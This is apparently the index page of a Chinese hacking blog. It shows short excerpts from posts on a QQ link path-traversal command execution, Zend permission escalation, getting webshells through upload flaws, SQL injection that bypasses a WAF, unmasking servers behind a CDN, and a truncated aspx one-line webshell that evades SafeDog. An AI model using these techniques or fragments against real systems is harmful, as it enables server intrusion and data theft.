腾讯TM、QQ远程命令执行漏洞 点开QQ消息 执行本地文件命令!

    当用户发送此类格式“网址”的时候: www.webshell.cc..\..\..\..\..\..\..\Windows\System32\cmd.exe 对方接收之后,点击鼠标左键打开该网址的时候,会被当成路径打开,从而可以恶意执行一些程序、系统命令,造成严重安全隐患。 漏洞原理很简单,不解释了…… 条件如下: 1、不能 url 编码,只能明文,囧rz…… 2、不能...

- 阅读全文 -

暗黑3疑似遭黑客攻击 玩家被洗劫一空

         《暗黑破坏神3》自15日发售以来至今已有一周多的时间,由于网络链接质量和错误代码的频繁出现让玩家们对本作抱怨不已,但就在此时有些玩家称自己的游戏帐号被盗了……   日前,据国外媒体报道称,由于游戏安全性问题现已发现多宗《暗黑3》帐户被盗。据介绍,此事件发生在上周日的下午约4点时,一些玩家登陆游戏时出现错误33和33007的代码,但就在重新登陆游戏后,却发现自己游戏中的各种物品和金...

- 阅读全文 -

通过Zend目录权限不严获取执行权限

服务器上很多都装了 Zend 就算 C:\Program Files 设置过权限,安装Zend后,Zend 会自动配置目录的权限 C:\Program Files\Zend\ZendOptimizer-3.3.0 下的目录权限为 Everyone 全权,这导致入侵者能写入文件。 如果黑客入侵一个服务器,只支持 asp,或php,没有执行权限,执行组件也给禁用了,只有读写文件的权限(只要读写权限就够...

- 阅读全文 -

快速找到windows2003系统下是哪个网站发包

  可以在本站查找phpddos解决方案 首先是看本地连接的收包和发包量,排除服务器被黑的情况, 然后打开C:\WINDOWS\system32\LogFiles\HTTPERR ,找到最新的一个iis日志, 然后ctrl+F 搜索port=如果出现“port= ”关键词,然后看后面会有一串数字, 这串数字是网站的标识符,这样就可以直接看到是哪个站点流量高了,直接关闭即可

- 阅读全文 -

关于“高校现代教学管理系统漏洞”的攻击与防范

作者:Blackeagle 转载文章请保留版权www.blackeagle.name QQ空间和博客同时首发 前段时间在群里看到一哥们分享了一个“高校现代教学管理系统漏洞”,方法很简单,很快就能拿到webshell。 原理和fck差不多,也是利用上传功能。 ftb.imagegallery.aspx 这是一个具有上传功能的目录,添加在该网站域名后即可打开。 之后上传带有可解析的asp马(需要解析改...

- 阅读全文 -

PHP 5.4 (5.4.3) Code Execution (Win32)

// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32) // Exploit author: 0in (Maksymilian Motyl) // Email: 0in(dot)email(at)gmail.com // * Bug with Variant type parsing originally discovered b...

- 阅读全文 -

渗透内网方法之巧用代理

代理在入侵里的作用-----妙用代理,渗透内网   一、踩点   主机: https://www.webshell.cc   OS:Windows 2000 + IIS 5.0 + MSSQL   端口:80 21i   数据库放内网,IP为 192.168.1.2 ,更重要的是内网数据库可以上网.   首页存在注入漏洞,sa登陆.   注入点:    https://www.webshell.cc/...

- 阅读全文 -

如何绕过D盾进行注入

少壮不努力,长大遇啊D ----某大黑客 D盾有多不爽我就不说了,现在都是批量注入,时不时的弹出D盾提示,甚是恼人。。。。。 其实这个并不是我发现的,而是国外的一个注入工具。某日本人心血来潮,想换一个linux系统玩玩儿,在互联网上逛了一大圈,发现大半都是带马的网站,甚是不爽,准备关闭、突然一个字眼吸引了我,没错,那就是Anonymous_os,看了下简介说是匿名者做的一个linux内核的操作系统...

- 阅读全文 -

获取使用CDN网站的真实IP

现在很多网站用了cdn技术,在做一些测试的时候,想获取其服务器真实IP地址就有点困难,不知道现在还有其他什么好的方法呢,整理了下,目前知道如下两种: 1:拿CDN服务器 找出真实IP cache_peer 1.1.1.1 parent 80 0 no-query originserver cache_peer_domain 1.1.1.1 www.xxxx.com 2:判断HTTP_X_FORWA...

- 阅读全文 -

可突破安全狗的aspx一句话

在看一个站的时候,发现服务器装了安全狗,刚开始利用IIS6的畸形解析一直被拦截,最后找到了不用畸形解析的办法,传了菜刀的一句话,却连不上,一直返回403,应该是被拦截,后来找了个相对比较生僻的一句话,终于上传并连接成功。 服务端一句话木马: <%@ Page Language="C#" ValidateRequest="false" %> <%try{ System.Reflec...

- 阅读全文 -